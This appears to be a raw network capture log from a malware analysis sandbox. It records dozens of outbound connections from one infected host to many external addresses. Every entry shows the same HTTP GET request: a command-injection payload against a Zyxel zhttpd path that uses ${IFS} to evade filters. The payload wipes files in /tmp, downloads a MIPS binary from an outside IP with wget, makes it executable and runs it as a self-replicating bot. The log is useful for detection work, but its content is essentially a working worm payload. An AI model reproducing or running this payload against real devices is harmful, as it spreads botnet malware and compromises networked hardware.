                                                Jan 12, 2024 18:16:37.792881012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8153192.168.2.2348814216.105.202.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792902946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8154192.168.2.233839020.117.227.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792924881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8155192.168.2.2347416173.139.89.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.792994976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8156192.168.2.2357560175.237.236.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793024063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8157192.168.2.2343490124.46.8.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793066025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8158192.168.2.233705843.244.91.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793111086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8159192.168.2.2358424169.118.196.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793157101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8160192.168.2.2341226138.125.120.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793191910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8161192.168.2.234223458.184.184.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793231010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8162192.168.2.2356176131.207.214.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793267012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8163192.168.2.2352632201.42.178.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793323040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8164192.168.2.2358540153.18.127.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793354034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8165192.168.2.235633898.241.37.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793380976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8166192.168.2.2351636109.254.10.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793426991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8167192.168.2.2334332186.79.103.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793457985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8168192.168.2.2353380220.72.89.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793525934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8169192.168.2.2345636102.32.156.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793576002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8170192.168.2.234215081.64.192.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793602943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8171192.168.2.2347854185.124.1.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793653011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8172192.168.2.2339076126.2.245.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793678999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8173192.168.2.2348370188.123.74.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793723106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8174192.168.2.234998053.173.239.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793756962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8175192.168.2.235357695.84.237.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793811083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8176192.168.2.2337468164.219.107.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793834925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8177192.168.2.2347320148.91.76.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793884039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8178192.168.2.2358242144.182.94.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.793992996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8179192.168.2.233366665.67.138.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794028044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8180192.168.2.2334992106.13.12.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794081926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8181192.168.2.2347568129.254.105.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794115067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8182192.168.2.233499883.40.154.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794162035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8183192.168.2.2351444187.128.6.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794188976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8184192.168.2.2349666221.177.147.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794239998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8185192.168.2.23599584.55.38.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794272900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8186192.168.2.2351368187.88.88.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794296980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8187192.168.2.234482424.231.148.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794354916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8188192.168.2.233944282.142.38.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794429064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8189192.168.2.2344442188.106.69.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794449091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8190192.168.2.2358840208.117.204.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794503927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8191192.168.2.2357114221.108.251.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794519901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192192.168.2.2351070136.174.249.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794579029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8193192.168.2.2360802213.221.87.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794612885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8194192.168.2.2346672154.91.19.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794645071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8195192.168.2.2343132144.113.25.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794704914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8196192.168.2.235361851.91.33.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794734955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8197192.168.2.2336460143.181.31.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794769049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8198192.168.2.2337164161.124.61.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794823885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8199192.168.2.2338666102.214.220.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794867992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8200192.168.2.2354552104.36.176.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794888973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8201192.168.2.2359438201.165.228.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794954062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8202192.168.2.2340308186.61.141.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.794994116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8203192.168.2.2350330204.103.110.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795051098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8204192.168.2.2356922143.123.235.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795072079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8205192.168.2.234319490.202.83.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795136929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8206192.168.2.235501877.109.243.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795175076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8207192.168.2.2334260128.153.10.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795207977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8208192.168.2.2346086111.110.55.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795281887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8209192.168.2.233286619.207.229.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795346022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8210192.168.2.2343636104.206.93.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795370102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8211192.168.2.2343720161.15.215.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795399904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8212192.168.2.235472019.219.111.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795442104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8213192.168.2.2346692167.57.226.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795489073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8214192.168.2.2354320132.91.61.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.795545101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8215192.168.2.2336878209.225.4.185443
                                                TimestampBytes transferredDirectionData
